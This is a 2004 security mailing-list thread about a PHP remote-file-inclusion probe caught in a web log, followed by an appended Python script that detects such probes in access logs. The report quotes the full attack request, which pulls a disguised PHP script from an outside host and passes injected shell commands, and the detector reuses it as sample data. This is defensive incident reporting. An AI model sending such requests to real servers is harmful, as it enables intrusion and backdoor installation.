Re: Data Cha0s PHP script attempt
From: Pall Thayer (pall_at_fa.is)
Date: 10/04/04
- Previous message: Michel Arboi: "DllTrojan ?"
- In reply to: Kirby Angell: "Data Cha0s PHP script attempt"
Date: Mon, 04 Oct 2004 15:33:28 +0000
To: Kirby Angell <kangell@alertra.com>
> I couldn't find much information about "lwp-trivial", but it seems to be
> not good for anything but badness. I guess I'll have to look into
> banning bots like this from our web server altogether.
LWP is the WWW module for Perl. lwp-trivial is the default user-agent
for Perl scripts using LWP to access web content.
Pall
Kirby Angell wrote:
> Source IP: 200.203.109.237
> Attack: PHP form variable include
>
> Twice tonight our web server received URL requests like this:
>
> GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0
> Host: uptime.alertra.com
> User-Agent: lwp-trivial/1.35
>
> The attack attempts to trick the uptime.php form into loading the given
> URL through one of the form variables. Our forms are highly paranoid,
> so that didn't work. Of interest though, if you haven't seen it (and I
> hadn't) is the script they tried to download:
>
> http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg
>
> which isn't a JPG at all, but itself is a PHP page. I guess they
> thought that our "pin" variable was used in an "include" statement. The
> rogue PHP script does all sorts of interesting things such as, running
> commands (as in the attack above), gathering intelligence, attempting
> exploits, and setting up back doors.
>
> The script is apparently not too recent. It won't work on any default
> PHP install version 4.2 and above because it assumes the variables
> passed to it will be converted to global variables (see:
> http://www.php.net/manual/en/security.globals.php). Recent versions of
> PHP no longer do this.
>
> The attacking IP seems to be a radio station in Brazil. I have sent an
> e-mail to them informing them that they are probably compromised.
>
> I couldn't find much information about "lwp-trivial", but it seems to be
> not good for anything but badness. I guess I'll have to look into
> banning bots like this from our web server altogether.
>
> --
> Thank you,
>
> Kirby Angell
> Get notified anytime your website goes down!
> http://www.alertra.com
> key: 9004F4C0
> fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
--
_______________________________
Pall Thayer
artist/teacher
http://www.this.is/pallit
http://pallit.lhi.is/panse
_______________________________
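One way to spot requests like the one quoted above in a web server's access log, as an added example that is not part of the original post: it parses combined-format log lines, treats a query parameter whose value is itself a URL as the core remote-file-inclusion signal, and only reports shell separators in other parameters (the "cmd=ls /;uname -a;w" pattern) when such a URL parameter is present. The log lines are constructed (the request line is the one from Kirby's report; the timestamps, status codes and byte counts are made up), and the user-agent check is deliberately a weak, separately reported signal, since lwp-trivial is just a default that legitimate Perl scripts send too.

```python
"""
Detect PHP remote-file-inclusion (RFI) probes of the kind quoted in this
thread in web-server access logs: a query parameter whose value is a URL,
optionally paired with a 'cmd' parameter carrying shell commands for the
included script to run.  Added example, not code from the original post;
the log lines are constructed (the request line from the post is reused,
the timestamps, status codes and sizes are made up).
"""
import re
from urllib.parse import urlsplit, unquote

# NCSA combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself a fetchable URL is the core RFI signal.
URL_VALUE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)
# Shell command separators; only reported alongside a URL parameter so that
# ordinary punctuation in form input does not raise alerts on its own.
SHELL_RE = re.compile(r'[;|`]|\$\(|&&')
# Default User-Agent strings of Perl's LWP (LWP::Simple sends lwp-trivial);
# a weak signal, since legitimate scripts use the same defaults.
SCRIPTED_UA_RE = re.compile(r'^(?:lwp-trivial|libwww-perl)/', re.IGNORECASE)


def split_query(query):
    """Split a raw query string on '&' only and percent-decode both halves.

    Done by hand rather than with parse_qsl because older Python versions
    also split on ';', which would mangle the 'ls /;uname -a;w' payload.
    """
    pairs = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        pairs.append((unquote(name), unquote(value)))
    return pairs


def analyse_target(target):
    """Return (verdict, findings) for one request target (path + query)."""
    params = split_query(urlsplit(target).query)
    url_params = [(n, v) for n, v in params if URL_VALUE_RE.match(v)]
    shell_params = [(n, v) for n, v in params if SHELL_RE.search(v)]
    findings = [('url_in_parameter', n, v) for n, v in url_params]
    if not url_params:
        return 'clean', findings
    if shell_params:
        findings += [('shell_in_parameter', n, v) for n, v in shell_params]
        return 'rfi_shell_probe', findings
    return 'rfi_probe', findings


def analyse_log(lines):
    """Parse access-log lines and return one result dict per parsable line."""
    results = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict, findings = analyse_target(m['target'])
        results.append({
            'ip': m['ip'],
            'target': m['target'],
            'user_agent': m['ua'],
            'scripted_client': bool(SCRIPTED_UA_RE.match(m['ua'])),
            'verdict': verdict,
            'findings': findings,
        })
    return results


# Constructed sample log: the first request is the one quoted in the post.
SAMPLE_LOG = [
    '200.203.109.237 - - [04/Oct/2004:03:12:45 +0000] '
    '"GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0" '
    '200 512 "-" "lwp-trivial/1.35"',
    '198.51.100.7 - - [04/Oct/2004:03:14:02 +0000] '
    '"GET /index.php?page=ftp://198.51.100.7/x.txt HTTP/1.0" 404 0 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [04/Oct/2004:03:15:30 +0000] '
    '"GET /uptime.php?pin=1234;x HTTP/1.1" 200 1024 "http://uptime.alertra.com/" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for r in analyse_log(SAMPLE_LOG):
        print(r['ip'], r['verdict'], r['user_agent'], r['findings'])
```

The third sample line carries a ';' in its parameter but no URL, so it is reported as clean: the URL-valued parameter is what makes the request an inclusion attempt, and the shell separators only tell you what the attacker intended the included script to run. Whether to act on the user-agent is a separate policy decision, which is why it is returned as its own flag rather than folded into the verdict.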